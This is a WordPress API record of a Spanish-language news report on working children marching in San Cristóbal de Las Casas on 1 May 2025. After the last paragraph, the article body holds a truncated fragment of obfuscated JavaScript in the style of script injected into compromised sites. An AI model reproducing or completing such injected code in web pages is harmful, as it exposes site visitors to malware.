{"id":21703,"date":"2025-05-02T03:23:25","date_gmt":"2025-05-02T03:23:25","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21703"},"modified":"2025-05-02T03:23:25","modified_gmt":"2025-05-02T03:23:25","slug":"ninas-y-ninos-trabajadores-marchan-en-san-cristobal-para-visibilizar-su-realidad-laboral","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21703","title":{"rendered":"Ni\u00f1as y ni\u00f1os trabajadores marchan en San Crist\u00f3bal para visibilizar su realidad laboral"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250501-WA0039-1024x576.jpg\" alt=\"\" class=\"wp-image-21704\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250501-WA0039-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250501-WA0039-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250501-WA0039-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250501-WA0039-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250501-WA0039.jpg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>1 de Mayo del 2025. \/ corresponsal<br>San Crist\u00f3bal de Las Casas.- En el marco del D\u00eda Internacional del Trabajo, ni\u00f1as, ni\u00f1os y adolescentes que realizan diversas actividades laborales en San Crist\u00f3bal de Las Casas protagonizaron una marcha este mi\u00e9rcoles por la ma\u00f1ana, con el objetivo de hacer visible su situaci\u00f3n y exigir el respeto a sus derechos.<\/p>\n\n\n\n<p>La movilizaci\u00f3n parti\u00f3 desde el andador Guadalupano y recorri\u00f3 puntos c\u00e9ntricos de la ciudad, incluyendo zonas donde los menores desempe\u00f1an cotidianamente su trabajo, como Merposur, la zona de la Catedral, Santo Domingo y el andador 20 de Noviembre.<\/p>\n\n\n\n<p>Acompa\u00f1ados por integrantes de la organizaci\u00f3n Melel Xojobal y del colectivo NNATS (Ni\u00f1as, Ni\u00f1os y Adolescentes Trabajadores), el contingente concluy\u00f3 su recorrido en la Plaza de la Paz. All\u00ed, los participantes realizaron actividades art\u00edsticas y manualidades como parte de una jornada de expresi\u00f3n y reflexi\u00f3n sobre el valor de su trabajo.<\/p>\n\n\n\n<p>Las organizaciones acompa\u00f1antes destacaron la importancia de reconocer la voz de la ni\u00f1ez trabajadora, promover su participaci\u00f3n activa en la sociedad y garantizar sus derechos, m\u00e1s all\u00e1 de los estigmas que enfrentan. La marcha, afirmaron, es un paso m\u00e1s hacia la construcci\u00f3n de un entorno m\u00e1s justo e incluyente para las infancias que trabajan.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 1 de Mayo del 2025. \/ corresponsalSan Crist\u00f3bal de Las Casas.- En el marco del D\u00eda Internacional del Trabajo, ni\u00f1as, ni\u00f1os y adolescentes que realizan diversas actividades laborales en San Crist\u00f3bal de Las Casas protagonizaron una marcha este mi\u00e9rcoles por la ma\u00f1ana, con el objetivo de hacer visible su situaci\u00f3n y exigir el respeto &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21704,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-21703","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21703","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21703"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21703\/revisions"}],"predecessor-version":[{"id":21705,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21703\/revisions\/21705"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21704"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21703"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21703"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21703"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}